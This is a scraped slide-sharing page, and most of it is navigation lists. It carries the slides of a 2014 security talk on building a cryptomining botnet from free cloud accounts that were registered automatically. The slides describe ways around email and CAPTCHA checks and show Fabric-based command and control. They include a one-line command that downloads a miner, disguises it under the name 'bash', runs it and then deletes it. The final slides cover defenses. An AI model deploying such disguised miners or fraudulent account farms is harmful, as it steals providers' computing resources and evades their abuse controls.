Expose Yourself Without Insecurity: Cloud Breach PatternsRob Ragan
 
DeadDropSF - Better Red Than Dead
DeadDropSF - Better Red Than DeadDeadDropSF - Better Red Than Dead
DeadDropSF - Better Red Than DeadRob Ragan
 
Interop 2017 - Defeating Social Engineering, BEC, and Phishing
Interop 2017 - Defeating Social Engineering, BEC, and PhishingInterop 2017 - Defeating Social Engineering, BEC, and Phishing
Interop 2017 - Defeating Social Engineering, BEC, and PhishingRob Ragan
 
Lord of the Bing - Black Hat USA 2010
Lord of the Bing - Black Hat USA 2010Lord of the Bing - Black Hat USA 2010
Lord of the Bing - Black Hat USA 2010Rob Ragan
 
Filter Evasion: Houdini on the Wire
Filter Evasion: Houdini on the WireFilter Evasion: Houdini on the Wire
Filter Evasion: Houdini on the WireRob Ragan
 
Static Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without FightingStatic Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without FightingRob Ragan
 

More from Rob Ragan (7)

Nbt hacker fight
Nbt hacker fightNbt hacker fight
Nbt hacker fight
 
Expose Yourself Without Insecurity: Cloud Breach Patterns
Expose Yourself Without Insecurity: Cloud Breach PatternsExpose Yourself Without Insecurity: Cloud Breach Patterns
Expose Yourself Without Insecurity: Cloud Breach Patterns
 
DeadDropSF - Better Red Than Dead
DeadDropSF - Better Red Than DeadDeadDropSF - Better Red Than Dead
DeadDropSF - Better Red Than Dead
 
Interop 2017 - Defeating Social Engineering, BEC, and Phishing
Interop 2017 - Defeating Social Engineering, BEC, and PhishingInterop 2017 - Defeating Social Engineering, BEC, and Phishing
Interop 2017 - Defeating Social Engineering, BEC, and Phishing
 
Lord of the Bing - Black Hat USA 2010
Lord of the Bing - Black Hat USA 2010Lord of the Bing - Black Hat USA 2010
Lord of the Bing - Black Hat USA 2010
 
Filter Evasion: Houdini on the Wire
Filter Evasion: Houdini on the WireFilter Evasion: Houdini on the Wire
Filter Evasion: Houdini on the Wire
 
Static Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without FightingStatic Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without Fighting
 

Recently uploaded

Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoffsammart93
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyKhushali Kathiriya
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...apidays
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century educationjfdjdjcjdnsjd
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...apidays
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Principled Technologies
 

Recently uploaded (20)

Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
 

CloudBots - Harvesting Crypto Currency Like a Botnet Farmer

  • 1. CloudBots: Harvesting Crypto Coins Like a Botnet Farmer 2014 August 6
  • 2. 2 …and Violating Terms of Service Building a Botnet with Free Cloud-based Services
  • 3. 3 Main Topics •  Could we build a botnet from freely available cloud services? •  Will we see the rise of more cloud based botnets? •  Should insufficient anti-automation be considered a top ten vulnerability? What are these guys talking about? Overview
  • 4. 4 Platform as a Service Cloud PaaS
  • 5. 5 Platform as a Service Free Cloud Services <Insert  with  other  providers  later>   Reference: http://goo.gl/AZ4nYp
  • 6. 6 Development Environment as a Service Free Cloud Services
  • 8. 8 Automating Registration •  Hurdles -  Email address confirmation -  CAPTCHA -  Phone/SMS -  Credit Card Usability vs Security Cloud Providers (In)Security
  • 9. 9 Anti-Automation Fraudulent Account Registration More Anti-Automation Email Confirmation Only 66% 33% EMAIL CAPTCHA CREDIT CARD PHONE
  • 10. 10 Anti-Automation Techniques •  Email address confirmation •  CAPTCHA •  Phone/SMS •  Credit Card Usability vs Security Cloud Providers (In)Security
  • 11. 11
  • 12. 12 Automated email processing -  Wildcard localpart *@domain.com -  Extract important information from incoming emails -  Grep for confirmation token links and request them Account registration -  Automatic request sent to account activation links SMTP Services Email Confirmation Token Processing
  • 14. 14 Using the Google AppEngine InboundMailHandler - first.last.001@cloudbotmail.appspotmail.com - first.last.002@cloudbotmail.appspotmail.com - first.last.003@cloudbotmail.appspotmail.com - first.last.004@cloudbotmail.appspotmail.com - first.last.005@cloudbotmail.appspotmail.com - first.last.006@cloudbotmail.appspotmail.com - first.last.007@cloudbotmail.appspotmail.com - first.last.008@cloudbotmail.appspotmail.com - first.last.009@cloudbotmail.appspotmail.com - first.last.010@cloudbotmail.appspotmail.com Google App Engine Detection issues
  • 15. 15 Unlimited usernames -  Prevent pattern recognition -  Pull from real world examples [local-part from dump]@domain.tld Realistic Randomness Real Email Addresses
  • 16. 16 Unlimited domains -  freedns.afraid.org -  Prevent detection -  Thousands of unique email domains SMTP Services Plethora of Email Addresses
  • 18. 18 What do we need? •  Free email relay -  Free MX registration •  Process wildcards -  *@domain.tld •  Send unlimited messages -  Unrestricted STMP to HTTP POST/ JSON requests Free Signups Receiving Email and Processing
  • 19. 19 Inbound Mail As A Service Free Cloud Services <Insert  with  other  providers  later>   Reference: http://goo.gl/yqoh6U
  • 20. 20 Automated email processing -  Extract important information from incoming emails -  Grep for confirmation token links and request them Account registration -  Automatic request sent to account activation links SMTP Services Email Confirmation Token Processing Reference: http://bishopfox.github.io/anti-anti-automation/
  • 21. 21 <Insert wall of random email addresses> Realistic Randomness Unique Email Addresses Avoid Pattern Recognition
  • 24. 24 MongoDB •  MongoLab •  MongoHQ Keeping track of all accounts Storing Account Information
  • 26. 26 What can we do? •  Distributed Network Scanning •  Distributed Password Cracking •  DDoS •  Click-fraud •  Crypto Currency Mining •  Data Storage Now we have a botnet! Fun! Botnet Activities
  • 29. 29 What are we using? •  Fabric -  Fabric is a Python library and command- line tool for streamlining the use of SSH for application deployment or systems administration tasks. •  fab check_hosts –P –z 20 •  fab run_command Botnet C2 Command & Control
  • 30. 30 Unique Amazon IP Addresses Distributed Command [na1.cloudbox.net:2352]: curl http://icanhazip.com 4.109.182.13 [eu1.cloudbox.net:3127]: curl http://icanhazip.com 126.34.56.254 [na1.cloudbox.net:10660]: curl http://icanhazip.com 58.251.42.128 [na1.cloudbox.net:15627]: curl http://icanhazip.com 74.216.236.72 [na1.cloudbox.net:8000]: curl http://icanhazip.com 28.228.253.19 [na1.cloudbox.net:4028]: curl http://icanhazip.com 64.216.37.252
  • 31. 31 Make money, money •  Deploying miners •  One command for $$$ All your processors are belong to us Litecoin Mining if [ ! -f bash ]; then wget http://sourceforge.net/projects/ cpuminer/files/pooler-cpuminer-2.3.2-linux-x86_64.tar.gz && tar zxfv pooler-cpuminer-2.3.2-linux-x86_64.tar.gz && rm pooler- cpuminer-2.3.2-linux-x86_64.tar.gz && mv minerd bash; fi; screen ./bash –url=stratum+tcp://pool.mine-litecoin.com -- userpass=ninja.47:47; rm bash
  • 32. 32 Load After Crypto Currency Mining Distributed Command ID | Host | Status ---------------------------------------- 0 | na1.cloudbox.net:1678 | 2 users, load average: 37.08, 37.60, 32.51 1 | na1.cloudbox.net:15121| 1 user, load average: 16.35, 15.35, 12.00 2 | na1.cloudbox.net:11631| 1 user, load average: 19.65, 18.46, 14.38 3 | na1.cloudbox.net:4358 | 2 users, load average: 23.10, 22.91, 18.95 4 | na1.cloudbox.net:1212 | 1 user, load average: 19.60, 18.47, 14.41 5 | na1.cloudbox.net:5841 | 1 user, load average: 19.97, 18.61, 14.52 6 | eu1.cloudbox.net:3025 | 1 user, load average: 19.27, 18.37, 14.33 7 | eu1.cloudbox.net:6892 | 2 users, load average: 19.65, 18.46, 14.38 8 | eu1.cloudbox.net:2038 | 1 user, load average: 18.85, 17.43, 13.45 9 | na1.cloudbox.net:5235 | 1 user, load average: 18.55, 17.32, 13.38 10 | na1.cloudbox.net:1122 | 1 user, load average: 26.04, 25.57, 20.02
  • 33. 33 All your processors are belong to us Litecoin Mining
  • 35. DETECTION No one can catch a ninja!
  • 36. 36 Automatic Backups •  Propagate to other similar services -  e.g. MongoLab ß à MongoHQ •  Infrastructure across multiple service providers •  Easily migrated Armadillo Up ™ Disaster Recovery Plan
  • 41. 41 Crypto Coins & DDoS Clouds Under Siege
  • 42. 42 Crypto Coins & DDoS Clouds Under Siege
  • 44. 44 What can we do? •  Logic puzzles •  Sound output •  Credit card validation •  Live operators •  Limited-use account •  Heuristic checks •  Federated identity systems Usability vs Security Protection Reference: http://www.w3.org/TR/2003/WD-turingtest-20031105/#solutions
  • 45. 45 What should we do? •  Analyzing properties of Sybil accounts •  Analyzing the arrival rate and distribution of accounts •  Flag accounts registered with emails from newly registered domain names •  Email verification •  CAPTCHAs •  IP Blacklisting •  Phone/SMS verification •  Automatic pattern recognition At Abuse vs At Registration Protection Reference: https://www.usenix.org/system/files/conference/usenixsecurity13/sec13-paper_thomas.pdf
  • 46. 46 At Abuse vs At Registration Protection Advanced techniques •  Signup flow events -  Detect common activities after signup •  User-agent -  A registration bot may generate a different user-agent for each signup or use uncommon user-agents •  Form submission timing -  A bot that doesn't mimic human behavior by performing certain actions too quickly can be detected Reference: https://www.usenix.org/system/files/conference/usenixsecurity13/sec13-paper_thomas.pdf
  • 47. THANK YOU Oscar Salazar @tracertea Rob Ragan @sweepthatleg CONTACT@BISHOPFOX.COM